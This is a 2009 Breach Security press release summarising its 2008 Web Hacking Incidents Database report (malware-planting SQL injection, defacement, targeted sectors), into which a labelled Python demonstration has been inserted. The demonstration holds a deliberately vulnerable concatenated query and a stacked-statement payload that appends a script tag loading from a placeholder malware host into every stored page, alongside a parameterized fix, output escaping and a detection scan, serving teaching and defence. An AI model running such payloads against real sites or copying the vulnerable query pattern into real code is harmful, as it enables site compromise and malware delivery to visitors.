SQL Injection Attacks Planting Malware on Web Sites Ranks #1 in Breach Security’s 2008 Web Hacking Incidents Database Report

New Type of SQL Injection Attack Successfully Compromised More Than 500,000 Web Sites Last Year, According to Report

CARLSBAD, Calif., Feb. 24, 2009 — Breach Security, Inc., the leader in web application integrity, security and PCI compliance, today announced that web attackers unleashed a new type of SQL injection attack in 2008 that successfully compromised more than 500,000 web sites, according to its Web Hacking Incidents Database (WHID) 2008 Annual Report. In a major shift for the web application security landscape, the report found that SQL injection attacks that plant malware on target web sites were the number one attack method used by online criminals last year.

Breach’s WHID report also noted a shift in attack methodology: in 2008, rather than targeting the sensitive information stored in a web site’s database, attackers focused on the site’s large base of visitors. The injection modifies the site’s stored content so that the site itself becomes a malware launching point, delivering the malicious code to legitimate users when they visit. The report also highlights one important factor – the unknown. Twenty-nine percent of the incidents were reported without specifying the attack method. This lack of attack vector confirmation may be attributed to a combination of two main factors: lack of visibility into web traffic and resistance to public disclosure.
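The mechanism described above, shown as an added example that is not taken from the WHID report or from Breach Security: a page lookup that concatenates a request parameter straight into SQL, a stacked-statement payload that appends a script tag to every stored page body (so every later visitor is served it), the parameterized replacement, and a check an incident responder can run to find rows already carrying an injected tag. The table, the page contents, the placeholder malware URL and the emulation of a stacked-statement driver are all constructed for this example.

```python
import html
import sqlite3

# Constructed sample content; the host in the payload is a placeholder, not a real site.
SAMPLE_PAGES = [(1, "Welcome", "Hello, world"), (2, "About", "About this shop")]
PAYLOAD = ("1; UPDATE pages SET body = body || "
           "'<script src=\"http://malware.example/x.js\"></script>'")


def make_db():
    """In-memory stand-in for the site's content database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", SAMPLE_PAGES)
    conn.commit()
    return conn


def vulnerable_lookup(conn, page_id):
    """Builds the query by concatenating an untrusted request parameter.

    sqlite3's execute() refuses stacked statements, so the loop below emulates
    a driver/DBMS that runs them (the 2008 incidents relied on that behaviour);
    the split is part of the simulation, not a pattern to copy.
    """
    sql = "SELECT title, body FROM pages WHERE id = " + page_id
    cur = conn.cursor()
    rows = []
    for stmt in sql.split(";"):
        if stmt.strip():
            cur.execute(stmt)
            if not rows:
                rows = cur.fetchall()  # results of the intended SELECT
    conn.commit()
    return rows


def safe_lookup(conn, page_id):
    """Validates the identifier and binds it as a parameter, so the payload
    never reaches the SQL parser as code."""
    try:
        pid = int(page_id)
    except ValueError:
        return []
    return conn.execute("SELECT title, body FROM pages WHERE id = ?", (pid,)).fetchall()


def render_page(rows, escape_output):
    """What a visitor receives. Serving stored content raw delivers an injected
    tag to the browser; output escaping keeps it inert even after tampering."""
    if not rows:
        return "<p>not found</p>"
    title, body = rows[0]
    if escape_output:
        title, body = html.escape(title), html.escape(body)
    return f"<h1>{title}</h1><div>{body}</div>"


def find_injected_pages(conn):
    """Incident-response check: ids of rows whose body now carries a script tag."""
    cur = conn.execute("SELECT id FROM pages WHERE lower(body) LIKE '%<script%' ORDER BY id")
    return [row[0] for row in cur.fetchall()]


if __name__ == "__main__":
    db = make_db()
    vulnerable_lookup(db, PAYLOAD)           # one request poisons every page
    print("tampered pages:", find_injected_pages(db))
    print(render_page(vulnerable_lookup(db, "2"), escape_output=False))
```

The parameterized lookup is the fix; the output escaping and the table scan are the defence in depth and the clean-up check a practitioner would want alongside it, since the attack leaves its payload in the database rather than in any log the web server keeps.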

The 2008 WHID report identified multiple hacking-for-profit mechanisms. In fact, 19 percent of attacks were aimed at stealing personal information. Traded easily on the Internet, personal records are the easiest virtual commodity to exchange for money. In addition, the report found that criminals also exploited web sites for financial gain via planting malware and phishing, which comprised 16 percent and 5 percent of attacks in 2008, respectively.

“Breach’s 2008 WHID report illustrates how the web application security landscape is continually changing. Hackers are becoming more savvy and utilizing new mechanisms for personal and financial gain,” said Ryan Barnett, director of application security research for Breach Security. “It’s nearly impossible for online retailers and other companies with a web presence to keep up with the latest attack vehicles in the absence of a web application security device. The changing nature of web application layer attacks further demonstrates the need for and validity of Breach’s security technology and expertise.”

Breach’s WHID report found that financial gain is not the only motivation for online attacks. The number one attack goal in 2008 was web site defacement. Defacement was used primarily against political parties, candidates and government departments, with ideologically motivated attackers often replacing a site’s content with a very specific message related to a campaign.

Consistent with the ideology-driven defacements noted in 2008, the WHID report also found that “Government, Security and Law Enforcement,” at 32 percent, was the top vertical market targeted by attackers. Internet-related organizations topped the list on the commercial side, including retail shops (mostly e-commerce sites), media companies and pure internet services such as search engines and service providers. In addition, financial institutions rose sharply in 2008, moving up to fourth place.

“The 2008 WHID report findings prove that no company or market sector is immune from attack. Even organizations with no financial data to lose can become victims of defacement,” said Barnett. “The rules of web application security are changing and a top-ranked web application security provider can protect organizations against the latest threats to their online security.”

The WHID is a project dedicated to maintaining a record of web application-related security incidents. The WHID’s purpose is to serve as a tool for raising awareness of web application security problems and to provide information for statistical analysis of web application security incidents. Unlike other resources covering web site security – which focus on the technical aspect of the incident – the WHID focuses on the impact of the attack. To download a copy of Breach’s 2008 WHID annual report, please visit www.breach.com/resources/whitepapers/2008WHID.html.

About Breach Security
Breach Security, Inc. is the leading provider of real-time, continuous web application integrity, security and compliance that protects sensitive web-based information. Breach Security’s products protect web applications from hacking attacks and data leakage, and ensure applications operate as intended. The company’s products are trusted by thousands of organizations around the world, including leaders in finance, healthcare, ecommerce, travel and government. For more information, please visit www.breach.com.